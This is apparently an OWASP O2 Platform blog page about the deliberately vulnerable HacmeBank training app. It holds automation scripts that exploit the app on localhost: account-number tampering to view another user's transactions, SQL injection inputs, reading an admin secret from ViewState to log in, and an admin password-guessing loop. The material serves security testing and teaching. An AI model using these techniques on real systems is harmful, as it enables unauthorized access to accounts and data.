OWASP O2 Platform Blog

Using O2 Platform and HacmeBank

Michael from the OWASP Costa Rica chapter wrote a great article about O2 and his first use of using it to automate HacmeBank’s login sequence: Starting with OWASP O2 Platform : a short step in a long journey

In reply I wrote Using O2 with HacmeBank which gives an overview of what you can do today with O2+HacmeBank  (and ideas for where to go next)

May 6, 2012 Posted by | .NET, HacmeBank | Leave a comment

O2 .NET AST Scanner – HacmeBank – SQL Injection PoC

This example show a complete trace for one of HacmeBank’s SQL injection vulnerabilties.

This was created with O2’s .NET AST Scanner (23-May-10 version) which allows the creation of a complete trace via ‘joining up’ the partial traces (for the web layer and web services layer)

Graph with Big Picture (all nodes)

Part 1 – Exploit/Payload location

Part 2 – Web Layer trace

Part 3 – WebServices trace

Script used to ‘join’ the two traces

// add payload and link it to the first node
var urlNode = "<a href="http://127.0.0.1:57096/HacmeBank_v2_Website/aspx/login.aspx">http://127.0.0.1:57096/HacmeBank_v2_Website/aspx/login.aspx</a>";
var postPayload = "POST payload: txtUserName";
 
graph.add_Node(urlNode);
graph.add_Node(postPayload);
graph.add_Edge(urlNode, postPayload);
graph.add_Edge(postPayload, graph.nodes()[0]);
 
// join traces that match the "method.*Ws_UserManagement.Login" reg ex
// with a new node called "INTERNET"
 
var internetNode = "INTERNET";
graph.add_Node(internetNode);
 
foreach(var node in graph.nodes())
    if(node.str().regEx("method.*Ws_UserManagement.Login"))
    {       
        graph.add_Edge(internetNode, node);
        graph.add_Edge(node, internetNode);
    }</pre>
&nbsp;

Source Code view of Web Layer code and trace

 

Source Code view of Web Services code and trace

July 29, 2011 Posted by | .NET, HacmeBank | 1 Comment

HacmeBank – Unit Tests for Vulnerabilities

The following examples show how to create automated exploits and PoCs (to be later transformed into unit tests) for HacmeBank’s vulnerabilities

This code uses O2’s WatiN integration to create an easy ‘IE automation’ scripting environement

Install and confirm we can login

After Installing HacmeBank and run the following script that will confirm if we are logged in:

var ie = "about:black".ie(0,500,750,500);
 
ie.open("http://localhost:58348/HacmeBank_v2_Website");
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();

Vulnerability:User A is able to see User’s B account details

var ie = "about:black".ie(0,500,750,500);
 
ie.open("http://localhost:58348/HacmeBank_v2_Website");

ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
 
ie.link("My Accounts").click();
ie.link("View Transactions").click();  
 
var url = ie.url();
var payload = url.replace("5204320422040003","5204320422040001");
ie.open(payload);
 
ie.closeInNSeconds(20);

Vulnerability:Sql Injection in Login page

public void vulnerability_Sql_Injection_in_Login_page()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv ' aaa").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
}

Vulnerability:Sql Injection in Accounts Details page

[Test]
public void vulnerability_Sql_Injection_in_Accounts_Details_page()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
    Browser.link("My Accounts").flash().click();
    Browser.link("View Transactions").flash().click(); 
    Browser.open(Browser.url()+"' AAAAA ");            
}

Vulnerability: Sensitive Information Disclosure in Admin Section Login

[Test]
public void vulnerability_Sensitive_Information_Disclosure_in_Admin_Section()
{
    setup(); 
    Browser.open(StartUrl); 
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").click();
    Browser.link("Admin Section").flash().click();                    
 
    var response = Browser.viewState().ViewState_Values[12];
 
    Browser.field("_ctl3:txtResponse").value(response).flash();           
    Browser.button("Login").flash().click();
}

Script: Fuzzing Admin password

panel.clear();
var topPanel = panel.add_Panel();
 
var ie = topPanel.add_IE().silent(true);
var startPage = "http://localhost:58915/HacmeBank_v2_Website/aspx/login.aspx";
Action<string> adminLogin =
    (password)=>{
            ie.open(startPage);
            ie.disableFlashing();
            ie.field("txtUserName").value("jv").flash();
                        ie.field("txtPassword").value("jv789").flash();
                        ie.button("Submit").click();
                        ie.link("Admin Section").flash().click();    
            //var secret = ie.viewState().ViewState_Values[12];             
            ie.field("_ctl3:txtResponse", password);
            ie.button("Login").click();
            //Add logic to detect admin Login
        };
 
for(int i =0 ; i < 10 ; i ++)
    adminLogin("admin" + i);       
 
//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

July 27, 2011 Posted by | HacmeBank, IE Automation, WatiN | Leave a comment